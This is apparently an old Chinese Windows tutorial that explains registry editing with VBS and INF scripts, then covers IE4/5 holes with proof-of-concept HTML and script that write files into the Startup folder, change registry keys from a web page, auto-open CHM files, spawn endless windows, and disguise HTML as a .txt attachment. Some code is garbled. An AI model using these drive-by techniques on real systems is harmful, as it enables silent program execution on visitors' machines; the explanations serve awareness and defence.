Windows 注册表攻略（二、注册表修改实例：40-45）

40、用脚本文件简单修改注册表

用.VBS脚本，也就是SCRIPT 脚本文件对注册表进行修改。如果您的爱机不支持VBSCRIPT，那么请您直接阅读第二部分。下面我通过一个例子自来解释脚本文件：
' Windows Script Host Sample Script
' You have a royalty-free right to use, modify, reproduce and distribute
' the Sample Application Files (and/or any modified version) in any way
' you find useful, provided that you agree that Microsoft has no warranty,
' obligations or liability for any Sample Application Files
This sample demonstrates how to write/delete entries in the registry.
L_Welcome_MsgBox_Message_Text = "此脚本显示如何创建和删除注册表项。"
' L_Welcome_MsgBox_Title_Text = "Windows Scripting Host 范例"
Call Welcome()
' *
' * Registry related methods.
' *　
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.Popup "创建项 HKCU\MyRegKey 数值为 'Top level key'"
WSHShell.RegWrite "HKCU\MyRegKey\", "Top level key"
WSHShell.Popup "创建项 HKCU\MyRegKey\Entry 数值为 'Second level key'"
WSHShell.RegWrite "HKCU\MyRegKey\Entry\", "Second level key"
WSHShell.Popup "将数值项 HKCU\MyRegKey\value 设为 REG_SZ 1"
WSHShell.RegWrite "HKCU\MyRegKey\value", 1
WSHShell.Popup "将数值项 HKCU\MyRegKey\Entry 设为 REG_DWORD 2"
WSHShell.RegWrite "HKCU\MyRegKey\Entry", 2, "REG_DWORD"
WSHShell.Popup "将数值项 HKCU\MyRegKey\Entry\value1 设为 REG_BINARY 3"
WSHShell.RegWrite "HKCU\MyRegKey\Entry\value1", 3, "REG_BINARY"
WSHShell.Popup "删除 HKCU\MyRegKey\Entry\value1 数值"
WSHShell.RegDelete "HKCU\MyRegKey\Entry\value1"
WSHShell.Popup "删除 HKCU\MyRegKey\Entry 项"
WSHShell.RegDelete "HKCU\MyRegKey\Entry\"
WSHShell.Popup "删除 HKCU\MyRegKey 项"
WSHShell.RegDelete "HKCU\MyRegKey\"
' *
' * Welcome
' *
Sub Welcome()
Dim intDoIt　
intDoIt = MsgBox(L_Welcome_MsgBox_Message_Text, _
vbOKCancel + vbInformation, _
L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
WScript.Quit
End If
End Sub
1.在上例中,单引号后面是注释.
2. L_Welcome_MsgBox_Message_Text = "此脚本显示如何创建和删除注册表项。"
L_Welcome_MsgBox_Title_Text = "Windows Scripting Host 范例"
这两句是提示.
3. 用 Set WSHShell = WScript.CreateObject("WScript.Shell"),定义一个对象WSHSHELL 为WScript.Shell,
4.WELCOME()是一个确认对话框.
5. WSHShell.Popup "创建项 HKCU\MyRegKey 数值为 'Top level key'" 是声明要修改的注册表项.
WSHShell.RegWrite "HKCU\MyRegKey\", "Top level key" 在HKCU下面创建MYREGKEY子键,读者也可以根据自己实际情况修改键名、指定路径。
6、REG_SZ为字符串,要用引号引起来,REG_DWORD 为0—2147483647之间整数,REG_BINARY与之范围相同。
7、需要注意的是，若结尾是“\”则创建一个主键（项），将其默认值设为逗号后面的值项，若结尾不是“\”，则在前一个“\”后面的项中建立所设立的value，逗号后面为其值。
8、WSHShell.RegDelete与WSHShell.RegWrite大致相同，只是功能相反。
各位可以将上面文档复制，存为FILENAME.VBS，然后双击即可。
用INF 脚本修改注册表。同样我先举一个例子，然后做详细讲解。
[VERSION]
SIGNATURE=$CHICAGO$　
[DEFAULTINSTALL]
ADDREG=MY.ADD.REG
DELREG=MY.DEL.REG　
[MY.ADD.REG]
HKLM,SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGON,AUTOADMINLOGON,0,”0”
HKCU,CONTROL PANEL\DESKTOP,SMOOTHSCROLL,1,01,00,00,00
HKCU,CONTROL PANEL\DESKTOP,SCREENSAVEUSEPASSWORD,1,00,00,00,00　
[MY.DEL.REG]
HKCU,MYKEY
HKLM,SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGON,DEFAULTUSERNAME
HKLM,SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGON,DEFAULTUSERNAME　
1.[VERSION] 是文件头。
SIGNATURE=$CHICAGO$ 是指针对WINDOWS（CHICAGO是WINDOWS95的内部名称）
要编辑注册表必须以这两句开头。
　　2、[DEFAULTINSTALL]段指出INF文件包含的其他段，ADDREG 和DELREG是键，有特殊意义，他指出要添加或删除的注册表项段名
　　3、WINDOWS98总是先处理DELREG段，后处理ADDREG段，这可能会对我们的应用有所帮助。
　　[MY.ADD.REG]
　　HKCU，MYKEY，MYvalue，0，“STRING” 添加名为MYvalue的字符串值项到键MYKEY下，其值设为STRING
　　HKCU，MYKEY，MYvalue，，STRING 添加名为MYvalue的字符串值项到MYKEY，将其值设为STRING
　　HKCU，MYKEY，MYvalue，1，77，34，05，20添加名为MYvalue的二进制值项到键MYKEY下，其值设为二进制值77，34，05，20
　　HKCU,MYKEY,0,”DEFAULT value” 设置键MYKEY的缺省值项为字符串DEFAULT value
　　HKCU,MYKEY,,”DEFAULT value” 设置键MYKEY的缺省值项并将其值设为字符串DEFAULT value
　　HKCU,MYKEY 添加注册表键MYKEY但不设置其值　
　　[MY.DEL.REG]
　　HKCU,MYKEY,MYvalue 从键MYKEY 中删除值项MYvalue
　　HKCU,MYKEY 删除键MYKEY及其全部子键,即删除全部分支.　
　　下面是一个自动清除MRU记录的INF文件:
　　CLEAN.INF
　　[VERSION]
　　SIGNATURE=$CHICAGO$　
　　[DEFAULTINSTALL]
　　DELREG=DELTEGKEY　
　　[DELREGKEY]
　　HKCU,”SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSIONEXPLORER\DOC FIND SPEC MRU”,
　　HKCU, SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSIONEXPLORER\FINDCOMPUTERMRU,
　　HKCU, SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSIONEXPLORER\RECENTDOCS,
　　HKCU, SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSIONEXPLORER\RUNMRU　
　　清除MRU和WINDOWS\RENCENT 的批处理文件
　　CLEAN.BAT
　　@ECHO OFF
　　C:\WINDOWS\RUNDLL.EXE SETUPX.DLL,INSTALLHINFSECTION DEFAULTINSTALL 132 CLEAN.INF
　　ECHOY |ERASE C:\WINDOWS\RECENT
　　各位可将CLEAN.BAT 加入HKEY_LOCAL_MACHINE\SOFTWAREMICROSOFT\WINDOWS\CURRENTVERSION\RUN中让电脑自动在启动时完成任务.

41、IE在安装组件时候存在“后门”

安全漏洞发布于2000年2月22日 by Juan Carlos Garcia Cuartango
影响版本
Internet Explorer 4.x and 5.x
漏洞描述
    跟IE发布的一个名称为 MS Active Setup的组件，该组件随IE 4.x和5.x一起安装，它有意提供了通过Internet的远程安装软件的技术。该组件将安装带有数字签名的软件。
在正常的操作下，所有的安装进程都将提醒用户要安装软件了，但是，由于Microsoft将它和桌面系统紧密地绑定在一起，所以当安装带有Microsoft签名的软件时，将强迫该正常操作不发出警告信息就直接安装和注册组件。
由于某些特定原因，Microsoft软件包和Windows操作系统之间的信任关系，而用户对这种信任关系没有任何控制权利。Juan充分的指出了这点一点，当用户通常访问一个由Microsoft控制的网站时，Microsoft都可能有机会在在用户不知情的情况下控制远程系统。
如果这个技术被一个入侵者掌握，那么他可以轻易的使用一个老版本带有bug的组件替换掉远程系统中的最新的和加过patch的版本，从而让该用户成为牺牲品。 
　 IE5.0 最新安全漏洞
一 概述
    Internet Explorer 5.0允许以创建或覆盖本地计算机文件及向其中写入内容的方式，在本地计算机上执行任意的程序。这个问题存在于ActiveX Control 之中，名字叫做"Object for constructing type libraries for scriptlets"，这个对象可以创建和更改本地文件。进行攻击时，可以创建一个基于HTML的应用程序，并使其在下次系统启动时执行。除了基于web的程序可进行攻击外，攻击也可通过email进行!!!
二 示范代码
    将下列代码写入htm文件，并使用IE5浏览这个文件。如果ActiveX被激活的话，the trojan（非常好玩,绝对无害---Ken）就会把自己加入到你的系统中。
<object id="scr" classid="
clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\allin.hta";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(`Written
by Ken,Visit http://allin.8m.com Please`)
;wsh.Run(`sol.exe`);</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
    这个页面创建了C:\windows\Start Menu\Programs\StartUpallin.hta，当它运行时，显示在屏幕上一条信息(Written by Ken http://allin.8m.com)并且在桌面上打开一个sol.exe(纸牌游戏)，切记，这种程序的行为可能会更加“恶劣”。也就是说你可能受到恶意的攻击。
三 防范措施
    为了对付上述程序的行为，一定要调整对IE5中ActiveX Scripting，控制选项，和插件的控制。要做到这一点：
    选工具，选项，安全，在对话框里，选择internet区域，自定义，这时会谈出一个新对话框，在新对话框中，调整所有的Active X属性全为“Disable”或者“提示”，记住如果你选择这些选项为“提示”，你可能会在上网时遇到大量的提示对话框。如果提示非常恼人，只要设置这些选项为“Disable”就行了。

42、浅谈IE的文本漏洞

　　 IE能将*.TXT中的HTML语句读出已经是众所周知的了,这个漏洞的危害性及普遍性甚至说利用性还是不高的.
    大家对HTML的语句可能造成的危害都有一定的共识,但对TXT呢,我想防患意识就不高了,上次我碰到REDCRACK,他和我开玩笑的时候,就让我去一个地方,后台开了个TXT文档,当时我没觉得不妥,事后一查,好家伙HAPPY TIME等大家伙都来了.于是我想,这个结合MIME头的运用,就可以有下载的权限了吧,现在的很多html语法都可以改注册表,推而广之,TXT的威力也是一样的,但隐蔽性绝对更高.
    下面是抄来的一段代码,大家可以看看
<SCRIPT Language="javascript" type="text/javascript"> //这里开始调用一个JS脚本
<!--
document.write("<APPLETHEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{ try }
{ //ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();  }
{ try }
if (documents.cookie.indexOf("Chg") == -1)
{ Shl.RegWrite("HKLM\\Software\\Microsoft\\InternetExplorer\\Main\\WindowTitle","I'amChinese!!");Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "I'am Chinese!"); //这里把IE title修改成了"I'am Chinese!"
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general;expires="+ expdate.toGMTString() + "; path=/;"  }
{catch(e) }
{catch(e) }
{  function init() }
{ setTimeout("f()", 1000); }
init();
// -->
</SCRIPT>

43、txt文件病毒

在众多媒体的宣传报道下，今天的我们都知道了不能轻易打开电子邮件里的可执行文件类的附件，但是显然那些破坏活动的制造者们也看了那些警告防范的文章，他们开始玩一些新的把戏，让您以为那些附件只不过是没有危险的文本文件或是图像文件等就是其手段之一。由于目前大多数人使用的是windows系列操作系统，windows的默认设置是隐藏已知文件扩展名的，而当你去点击那个看上去很友善的文件，那些破坏性的东西就跳出来了。您可能说这我早就知道了，那么下面讲述的.txt文件的新欺骗方法及原理您知道吗？
　　假如您收到的邮件附件中有一个看起来是这样的文件：QQ靓号放送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号放送.txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下：
　　您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始格式化d盘，同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？
　　欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。
　　文件内容中的第2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者，在其中可以加载带有破坏性质的命令。那么第2行又是干什么的呢？您可能已经注意到了第2行里的“WSCript”，对！就是它导演了全幕，它是实际行动总指挥。
　　WScript全称Windows Scripting Host，它是Win98新加进的功能, 是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器，位于c:\WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在Windows Scripting Host脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
　　下面我们通过一个小例子来说明Windows Scripting Host功能是如何的强大，使用又是怎样的简单，被有心人利用后的威胁有多大。例如有内容如下的*.vbs文件：
　　Set so=CreateObject("Scripting.FileSystemObject")
so.GetFile(c:\windows\winipcfg.exe).Copy("e:\winipcfg.exe")
　　就是这么两行就可以拷贝文件到指定地点。第一行是创建一个文件系统对象，第二行前面是打开这个脚本文件，c:\windows\winipcfg.exe指明是这个程序本身，是一个完整的路径文件名。GetFile函数获得这个文件，Copy函数将这个文件复制到e盘根目录下。这也是大多数利用VBscript编写的病毒的一个特点。从这里可以看出，禁止了FileSystemObject这个对象就可以很有效的控制这种病毒的传播。用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。
　　欺骗识别及防范方法：这种带有欺骗性质的.txt文件显示出来的并不是文本文件的图标，它显示的是未定义文件类型的标志，这是区分它与正常.txt文件的最好方法。识别的另一个办法是在“按WEB页方式”查看时在“我的电脑”左面会显示出其文件名全称，此时可以看到它不是真正的txt文件。问题是很多初学者经验不够，老手也可能因为没留意而打开它，在这里再次提醒您，注意您收到的邮件中附件的文件名，不仅要看显示出来的扩展名，还要注意其实际显示的图标是什么。对于附件中别人发来的看起来是.txt的文件，可以将它下载后用鼠标右键选择“用记事本打开”，这样看会很安全。

44、IE又一漏洞解

看下面代码：
<SCRIPT>
function g()
{s=document.URL;
path=s.substr(0,s.lastIndexOf("\\"));
path=unescape(path);
window.showHelp(path+"\\chm1.chm");
setTimeout("g()",50); // if you are on a slow internet connection you must increase the delay
</SCRIPT>
IE5.X的一个新漏洞，打开网页后会自动运行一个chm文件，通过修改这个chm文件可以让浏览者运行任意程序，现在的设定是让你运行写字板 （打开网页有效）
下面的是原代码
<script language="javascript">
function WindowBomb()
{ var iCounter = 0 // dummy counter while (true)
{window.open("open.htm","CRASHING"+ iCounter,"width=1,
height=1,resizable=no")
{iCounter++ }
kao~IE炸弹。

45、隐藏在网页中的程序

隐藏在网页中的程序，微软的IE/Outlook4.X-5.X浏览器有一个com.ms.activeX.ActiveXComponent漏洞，可以使一个恶意程序在访问者浏览网页时加载并下载到访问者电脑，并执行。本文给大家一个例子，要大家知道我们平时上网多么危险。本程序将在您的桌面上建立一个叫CNers.COM.HTM的文件：
<HTML>
<HEAD>
<TITLE>
Demo#2-IE5.5/Outlook安全漏洞-com.ms.activeX.
ActiveXComponent
允许执行任意程序
</TITLE>
</HEAD>
<BODY>
<BR>
<APPLET code="com.ms.activeX.ActiveXComponent" >
</APPLET>
<!-- ^^^ This gives java exceptions in java console, but the object is
instantiated -->

<SCRIPT LANGUAGE="javascript">
a1=document.applets[0];
fn="CNers.COM.HTM";
doc="<SCRIPT>s1=\'欢迎你访问视窗安全！\\请您将在启动文件夹内的CNers.COM.HTM删除即可\';alert(s1);document.
body.innerHTML=s1</"+"SCRIPT>";
function f1()
{
a1.setProperty('DOC',doc);
}
function f()
{
// The ActiveX classid
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
setTimeout("a1.setProperty('Path','"+fn+"')",1000);
setTimeout("f1()",1500);
setTimeout("a1.invoke('write',VA);alert('"+fn+" 被建立');",2000);
}
setTimeout("f()",1000)
</SCRIPT>
<SCRIPT LANGUAGE="VBSCRIPT">
VA = ARRAY()
' 获取com.ms.com.Variant[]
</SCRIPT>
<BR>
</BODY>
</HTML>
    这样，我们在您的桌面上建立了文件，并写入启动组。当然我们可以写一个64KB的程序，并让你在没有被警告的情况下执行，从而控制您的电脑。